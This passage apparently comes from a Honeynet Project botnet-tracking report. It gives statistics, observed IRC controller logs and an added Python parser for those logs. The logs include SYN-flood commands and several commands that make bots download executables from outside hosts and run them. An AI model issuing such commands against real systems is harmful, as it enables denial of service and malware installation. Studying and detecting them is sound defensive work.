Lessons Learned

In this section we present some of the findings we obtained through our observation of botnets. Data is sanitized so that it does not allow one to draw any conclusions about specific attacks against a particular system, and protects the identity and privacy of those involved. Also, as the data for this paper was collected in Germany by the German Honeynet Project, information about specific attacks and compromised systems was forwarded to DFN-CERT (Computer Emergency Response Team) based in Hamburg, Germany. We would like to start with some statistics about the botnets we have observed in the last few months:

  • Number of botnets
    We were able to track a little more than 100 botnets during the last four months. Some of them "died" (e.g. the main IRC server went down or the attacker was inexperienced) and at the moment we are tracking about 35 active botnets.
  • Number of hosts
    During these few months, we saw 226,585 unique IP addresses joining at least one of the channels we monitored. Seeing an IP here means that the IRCd was not modified to suppress the JOIN message for each joining client. If an IRCd is modified not to show joining clients in a channel, we do not see IPs. Furthermore, some IRCds obfuscate the joining client's IP address, and obfuscated IP addresses do not count as seen either. This shows that the threat posed by botnets is probably worse than originally believed. Even if we are very optimistic and estimate that we track a significant percentage of all botnets and that none of our tracked botnet IRC servers are modified to hide JOINs or obfuscate the joining clients' IPs, this would mean that more than one million hosts are compromised and can be controlled by malicious attackers. We know there are more botnet clients, since the attackers sometimes use modified IRC servers that do not give us any information about joining users.
  • Typical size of Botnets
    Some botnets consist of only a few hundred bots. In contrast, we have also monitored several large botnets with up to 50,000 hosts. The actual size of such a large botnet is hard to estimate. Often the attackers use heavily modified IRC servers and the bots are spread across several IRC servers. We use link-checking between IRCds to detect connections between different botnets that form one large botnet, and are thus able to approximate the actual size. Keep in mind that botnets with over several hundred thousand hosts have been reported in the past. If a botnet consists of more than 5 linked IRC servers, we simply say it is large, even if we are not able to determine an exact number because the IRCd software is stripped down. As a side note: we know about a home computer which got infected by 16 (sic!) different bots, so it is hard to make an estimation about the world bot population here.
  • Dimension of DDoS-attacks
    We are able to make an educated guess about the current dimension of DDoS-attacks caused by botnets. We can observe the commands issued by the controllers and thus see whenever a botnet is used for such attacks. From the beginning of November 2004 until the end of January 2005, we were able to observe 226 DDoS-attacks against 99 unique targets. Often these attacks targeted dial-up lines, but there were also attacks against bigger websites. To point out the threat posed by such attacks, we present the collected data about DDoS-attacks on a separate page. "Operation Cyberslam" documents one commercial DDoS run against competitors in online selling.

    A typical DDoS-attack looks like the following examples: the controller enters the channel and issues the command (sometimes even stopping further spreading of the bots first). After the bots have done their job, they report their status:

    [###FOO###] <~nickname> .scanstop
    [###FOO###] <~nickname> .ddos.syn 151.49.8.XXX 21 200
    [###FOO###] <-[XP]-18330> [DDoS]: Flooding: (151.49.8.XXX:21) for 200 seconds
    [...]
    [###FOO###] <-[2K]-33820> [DDoS]: Done with flood (2573KB/sec).
    [###FOO###] <-[XP]-86840> [DDoS]: Done with flood (351KB/sec).
    [###FOO###] <-[XP]-62444> [DDoS]: Done with flood (1327KB/sec).
    [###FOO###] <-[2K]-38291> [DDoS]: Done with flood (714KB/sec).
    [...]
    [###FOO###] <~nickname> .login 12345
    [###FOO###] <~nickname> .ddos.syn 213.202.217.XXX 6667 200
    [###FOO###] <-[XP]-18230> [DDoS]: Flooding: (213.202.217.XXX:6667) for 200 seconds.
    [...]
    [###FOO###] <-[XP]-18320> [DDoS]: Done with flood (0KB/sec).
    [###FOO###] <-[2K]-33830> [DDoS]: Done with flood (2288KB/sec).
    [###FOO###] <-[XP]-86870> [DDoS]: Done with flood (351KB/sec).
    [###FOO###] <-[XP]-62644> [DDoS]: Done with flood (1341KB/sec).
    [###FOO###] <-[2K]-34891> [DDoS]: Done with flood (709KB/sec).
    [...]

    Both attacks show typical targets of DDoS-attacks: an FTP server on port 21/TCP or an IRC server on port 6667/TCP.

  • Spreading of botnets
    ".advscan lsass 150 5 0 -r -s" and other commands are the most frequently observed messages. Through this and similar commands, bots spread and search for vulnerable systems. Commonly, Windows systems are exploited and thus we see most traffic on typical Windows ports (e.g. for CIFS-based file sharing). We have analyzed this in more detail and present the results on a page dedicated to the spreading of bots.
  • Harvesting of information
    Sometimes we can also observe the harvesting of information from all compromised machines. With the help of a command like ".getcdkeys" the operator of the botnet is able to request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold to crackers, or the attacker can use them for several other purposes, since they are considered valuable information. These operations are rare, though.
  • "Updates" within botnets
    We also observed updates of botnets quite frequently. Updating in this context means that the bots are instructed to download a piece of software from the Internet and then execute it. Examples of issued commands include:

    .download http://spamateur.freeweb/space.com/leetage/gamma.exe c:\windows\config\gamma.exe 1
    .download http://www.spaztenbox.net/cash.exe c:\arsetup.exe 1 -s
    !down http://www.angelfire.com/linuks/kuteless/ant1.x C:\WINDOWS\system32\drivers\disdn\anti.exe 1
    ! dload http://www.angelfire.com/linuks/kuteless/ant1.x C:\firewallx.exe 1
    .http.update http://59.56.178.20/~mugenxur/rBot.exe c:\msy32awds.exe 1
    .http.update http://m1cr0s0ftw0rdguy.freesuperhost.com/jimbo.jpg %temp%\vhurdx.exe -s

    (Note: We sanitized the links so the code is not accidentally downloaded/executed)

    As you can see, the attackers use diverse webspace providers and often obfuscate the downloaded binary. The parameter "1" in the command tells the bots to execute the binary once they have downloaded it. This way, the bots can be dynamically updated and further enhanced. We also collect the malware that the bots download and analyze it further if possible. In total, we have collected 329 binaries. 201 of these files are malware, as an analysis with "Kaspersky Anti-Virus On-Demand Scanner for Linux" shows:

         28 Backdoor.Win32.Rbot.gen
         27 Backdoor.Win32.SdBot.gen
         22 Trojan-Dropper.Win32.Small.nm
         15 Backdoor.Win32.Brabot.d
         10 Backdoor.Win32.VB.uc
          8 Trojan.WinREG.LowZones.a
          6 Backdoor.Win32.Iroffer.b
          5 Trojan.Win32.LowZones.q
          5 Trojan-Downloader.Win32.Small.qd
          5 Backdoor.Win32.Agobot.gen
          4 Virus.Win32.Parite.b
          4 Trojan.Win32.LowZones.p
          4 Trojan.BAT.Zapchast
          4 Backdoor.Win32.Wootbot.gen
          4 Backdoor.Win32.ServU-based
          4 Backdoor.Win32.SdBot.lt
          3 Trojan.Win32.LowZones.d
          3 Trojan-Downloader.Win32.Agent.gd
          2 Virus.BAT.Boho.a
          2 VirTool.Win32.Delf.d
          2 Trojan-Downloader.Win32.Small.ads
          2 HackTool.Win32.Clearlog
          2 Backdoor.Win32.Wootbot.u
          2 Backdoor.Win32.Rbot.af
          2 Backdoor.Win32.Iroffer.1307
          2 Backdoor.Win32.Iroffer.1221
          2 Backdoor.Win32.HacDef.084
          1 Trojan.Win32.Rebooter.n
          1 Trojan.Win32.LowZones.ab
          1 Trojan.Win32.KillFiles.hb
          1 Trojan-Spy.Win32.Quakart.r
          1 Trojan-Proxy.Win32.Ranky.aw
          1 Trojan-Proxy.Win32.Agent.cl
          1 Trojan-Downloader.Win32.Zdown.101
          1 Trojan-Downloader.Win32.IstBar.gv
          1 Trojan-Downloader.Win32.IstBar.er
          1 Trojan-Downloader.Win32.Agent.dn
          1 Trojan-Clicker.Win32.Small.bw
          1 Trojan-Clicker.Win32.Agent.bi
          1 Net-Worm.Win32.DipNet.f
          1 HackTool.Win32.Xray.a
          1 HackTool.Win32.FxScanner
          1 Backdoor.Win32.Wootbot.ab
          1 Backdoor.Win32.Wisdoor.at
          1 Backdoor.Win32.Spyboter.gen
          1 Backdoor.Win32.Rbot.ic
          1 Backdoor.Win32.Rbot.fo
          1 Backdoor.Win32.Optix.b
          1 Backdoor.Win32.Agent.ds

    Most of the other binary files are either adware (a program that displays banners while being run, or reports user habits or information to third parties), proxy servers (a computer process that relays a protocol between client and server computer systems) or Browser Helper Objects.
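As an added example that is not part of the paper, the following Python parser handles both kinds of controller traffic shown in the list above: the ".ddos.*" commands with the bots' "Done with flood" reports (yielding per-attack bot counts and bandwidth totals) and the ".download"/"!down"/"! dload"/".http.update" commands (yielding host, destination path, the "1" execute flag, and whether the remote name hides an executable). It assumes that the "~" prefix marks the controller and that update commands appear in the channel with the same "[chan] <nick>" line format; neither is stated in the paper.

```python
import re
from urllib.parse import urlsplit
# Constructed sample, condensed from the channel lines and update commands
# quoted above; the links are the paper's already sanitized ones. Assumption:
# update commands are issued in the channel with the same "[chan] <nick>" prefix.
SAMPLE_LOG = r"""
[###FOO###] <~nickname> .scanstop
[###FOO###] <~nickname> .ddos.syn 151.49.8.XXX 21 200
[###FOO###] <-[XP]-18330> [DDoS]: Flooding: (151.49.8.XXX:21) for 200 seconds
[###FOO###] <-[2K]-33820> [DDoS]: Done with flood (2573KB/sec).
[###FOO###] <-[XP]-86840> [DDoS]: Done with flood (351KB/sec).
[###FOO###] <~nickname> .ddos.syn 213.202.217.XXX 6667 200
[###FOO###] <-[2K]-33830> [DDoS]: Done with flood (2288KB/sec).
[###FOO###] <-[XP]-18320> [DDoS]: Done with flood (0KB/sec).
[###FOO###] <~nickname> .download http://www.spaztenbox.net/cash.exe c:\arsetup.exe 1 -s
[###FOO###] <~nickname> ! dload http://www.angelfire.com/linuks/kuteless/ant1.x C:\firewallx.exe 1
[###FOO###] <~nickname> .http.update http://m1cr0s0ftw0rdguy.freesuperhost.com/jimbo.jpg %temp%\vhurdx.exe -s
"""

LINE_RE = re.compile(r"^\[[^\]]+\] <(?P<nick>[^>]+)> (?P<msg>.*)$")
DDOS_RE = re.compile(r"^\.ddos\.(?P<kind>\w+) (?P<target>\S+) (?P<port>\d+) (?P<secs>\d+)$")
DONE_RE = re.compile(r"^\[DDoS\]: Done with flood \((?P<rate>\d+)KB/sec\)")
UPDATE_RE = re.compile(r"^(?:\.download|\.http\.update|!\s*down|!\s*dload)"
                       r"\s+(?P<url>\S+)\s+(?P<dest>\S+)(?P<flags>.*)$")

def parse_channel(log_text):
    """Return (attacks, updates). Bot 'Done' reports are credited to the most
    recent .ddos.* command; a '1' flag in an update means run after download."""
    attacks, updates = [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        nick, msg = m["nick"], m["msg"]
        # Assumption: the '~' prefix marks the channel owner, i.e. the controller.
        if nick.startswith("~"):
            if d := DDOS_RE.match(msg):
                attacks.append({"kind": d["kind"], "target": d["target"], "port": int(d["port"]),
                                "seconds": int(d["secs"]), "bots_done": 0, "kb_per_sec": 0})
            elif u := UPDATE_RE.match(msg):
                flags = u["flags"].split()
                remote = urlsplit(u["url"]).path.rsplit("/", 1)[-1].lower()
                # A non-.exe name on the server that lands as an .exe on disk is the obfuscation noted above.
                updates.append({"host": urlsplit(u["url"]).hostname, "dest": u["dest"],
                                "execute": "1" in flags, "silent": "-s" in flags,
                                "disguised": u["dest"].lower().endswith(".exe") and not remote.endswith(".exe")})
        elif (r := DONE_RE.match(msg)) and attacks:
            attacks[-1]["bots_done"] += 1
            attacks[-1]["kb_per_sec"] += int(r["rate"])
    return attacks, updates
```

Bot lines that match neither pattern (such as the "Flooding:" acknowledgement) and controller commands other than the two families (such as ".scanstop") are ignored, so the same loop can run over a full channel capture.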

An event that is not that unusual is that somebody steals a botnet from someone else. It can be somewhat humorous to observe several competing attackers. As mentioned before, bots are often "secured" by some sensitive information, e.g. the channel name or server password. If one is able to obtain all this information, one is able to update the bots within another botnet to another bot binary, thus stealing the bots from that botnet. For example, some time ago we could monitor when the controller of Botnet #12 stole bots from the seemingly abandoned Botnet #25.

We recently had a very unusual update run on one of our monitored botnets: everything went fine, the botnet master authenticated successfully and issued the command to download and execute the new file. Our client drone downloaded the file and it got analyzed; we set up a client with the specially crafted nickname, ident, and user info. But then our client could not connect to the IRC server to join the new channel. The first character of the nickname was invalid to use on that IRCd software. This way, the (somewhat dumb) attacker just lost about 3,000 bots, which hammer their server with connection attempts forever.

Something which is interesting, but rarely seen, is botnet owners discussing issues in their bot channel. We observed several of those talks and learned more about their social life this way. We once observed a small shell hoster hosting a botnet on his own servers and DDoSing competitors. These people used the same nicknames for commanding the botnet as for giving support for their shell accounts in another IRC network. Furthermore, some people who run botnets offer an excellent pool of information about themselves, as they do not use free and anonymous webhosters to run updates on their botnets. These individuals demonstrate how even unskilled people can run and leverage a botnet.

Our observations showed that botnets are often run by young males with surprisingly limited programming skills. The scene forums are crowded with posts like "How can i compile *" and similar questions. These people often achieve a good spread of their bots, but their actions are more or less harmless. Nevertheless, we also observed some more advanced attackers: these persons join the control channel only rarely. They use only one-character nicks, issue a command and leave afterwards. The updates of the bots they run are very professional. Probably these people use the botnets commercially and "sell" the services. A low percentage use their botnets for financial gain, for example by installing Browser Helper Objects for companies tracking/fooling websurfers or clicking pop-ups. A very small percentage of botnet runners seems highly skilled: they strip down their IRCd software to a non-RFC-compliant daemon, not even allowing standard IRC clients to connect.

Another possibility is to install special software to steal information. We had one very interesting case in which attackers stole Diablo 2 items from the compromised computers and sold them on eBay. Diablo 2 is an online game in which you can improve your character by collecting powerful items. The rarer an item is, the higher its price on eBay. A search on eBay for Diablo 2 shows that some of these items allow an attacker to make a nice profit. Some botnets are used to send spam: you can rent a botnet. The operators give you a SOCKS v4 server list with the IP addresses of the hosts and the ports their proxy runs on. There are documented cases where botnets were sold to spammers as spam relays: "Uncovered: Trojans as Spam Robots". You can see an example of an attacker installing software (in this case rootkits) in a captured example.